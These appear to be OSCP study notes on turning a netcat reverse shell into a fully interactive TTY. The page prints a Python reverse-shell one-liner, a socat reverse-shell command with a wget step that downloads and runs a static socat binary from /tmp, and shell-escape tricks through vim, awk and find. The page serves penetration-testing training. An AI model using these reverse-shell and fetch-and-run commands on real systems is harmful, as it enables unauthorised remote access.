OSCP Notes

Upgrading shell

Netcat is a great tool, but it also has its shortcomings:

  • Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell;

  • You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts;

  • Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively);

  • Features like job control, tab complete and command history with the up-arrow are also missing.

To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.

Different PTY modules

Python pty module

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
(Here $ip is a placeholder for the listener address.)

Perl

perl -e 'exec "/bin/sh";'

Using socat

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If socat is not installed on the victim, download a static binary and run it from /tmp:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Other ways

/bin/sh -i

From within a Python interpreter:

os.system('/bin/bash')

From within Perl:

exec "/bin/sh";

Related Shell Escape Sequences

Vi / Vim

:!bash
:set shell=/bin/bash
:shell

awk

awk 'BEGIN {system("/bin/bash")}'

find

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;

Netcat Magic

1. First spawn a PTY shell with Python or Bash:

python -c 'import pty; pty.spawn("/bin/bash")'

2. Background the process with Ctrl-Z

3. Examine the current terminal and STTY info so we can force the connected shell to match it:

stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

The information needed is the size of the current TTY (“Example: rows 38; columns 116”)

4. With the shell still backgrounded, set the current STTY to raw mode and turn off local echo of typed characters (-echo) with the following command:

stty raw -echo

With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed.

5. Next foreground the shell with fg. It will re-open the reverse shell, but the formatting will be off. Finally, reinitialize the terminal (type reset and press Enter).

6. After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (using the info gathered above):

$ export SHELL=bash

$ export TERM=xterm-256color

$ stty rows 38 columns 116

The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :)
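Why the two key steps above work (spawning a PTY in step 1, and setting rows/columns in step 6) is easier to see in a few lines of Python. The script below is an added example, not code from the original notes: it runs a constructed probe command once over plain pipes (what a netcat shell gives you: stdin is a socket, so programs see no terminal) and once under a pseudo-terminal opened with the same pty module, and it sets the pty's window size from the outside with TIOCSWINSZ, which is exactly the value that stty rows/columns writes from the inside. It assumes a Unix host with sh and stty available; the function names and the probe command are my own.

```python
import os
import pty
import struct
import fcntl
import termios
import subprocess

# Constructed probe: prints "yes" when the process's stdin is a terminal, "no" otherwise.
TTY_PROBE = ["sh", "-c", "if [ -t 0 ]; then echo yes; else echo no; fi"]


def run_over_pipe(cmd):
    """Run cmd the way a plain netcat shell runs things: stdin/stdout are not terminals."""
    result = subprocess.run(cmd, stdin=subprocess.DEVNULL, capture_output=True, text=True)
    return result.stdout.strip()


def run_under_pty(cmd, rows=38, cols=116):
    """Run cmd with a pseudo-terminal attached (what pty.spawn() does) and return its output.

    The window size belongs to the pty itself: `stty rows R columns C` typed inside the
    upgraded shell sets the same TIOCSWINSZ value that is set here from the outside.
    """
    master, slave = pty.openpty()
    # struct winsize { ws_row, ws_col, ws_xpixel, ws_ypixel }
    fcntl.ioctl(slave, termios.TIOCSWINSZ, struct.pack("HHHH", rows, cols, 0, 0))
    proc = subprocess.Popen(cmd, stdin=slave, stdout=slave, stderr=slave, close_fds=True)
    os.close(slave)  # only the child holds the slave side now
    chunks = []
    while True:
        try:
            data = os.read(master, 4096)
        except OSError:  # Linux reports EIO once the slave side is fully closed
            break
        if not data:     # macOS/BSD report a plain EOF instead
            break
        chunks.append(data)
    proc.wait()
    os.close(master)
    # The pty line discipline turns "\n" into "\r\n" on output; normalise that away.
    return b"".join(chunks).decode(errors="replace").replace("\r\n", "\n").strip()


def compare():
    """Return what a program sees with and without a pty, plus the size stty reports."""
    return {
        "over_pipe": run_over_pipe(TTY_PROBE),            # "no"
        "under_pty": run_under_pty(TTY_PROBE),            # "yes"
        "size_seen_by_stty": run_under_pty(["stty", "size"], rows=38, cols=116),  # "38 116"
    }


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name}: {value}")
```

The "no" versus "yes" result is the whole reason programs like su, vim and ssh refuse to behave in a raw netcat shell: they check isatty() on their standard streams. The size check shows why step 6 matters: a freshly created pty has a 0x0 window until someone sets it, so full-screen programs would draw garbage until stty rows/columns is run.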

Obtaining a full interactive shell with zsh

Current Kali releases ship with zsh as the default shell, so it is important to learn this method, because the one above will not work from a zsh shell.

1. Get a TTY shell with the commands above, then background the process with Ctrl+Z

2. Get the number of rows and columns with

stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

3. To ignore hotkeys in the local shell and return to your reverse shell, enter

stty raw -echo; fg
# Note: For zsh users it is important to enter this in one line!

4. Configure your rows and columns

stty rows <ROWS> cols <COLS>

5. Export term

export TERM=xterm-256color

6. All you need to do now, is reload your shell:

exec /bin/bash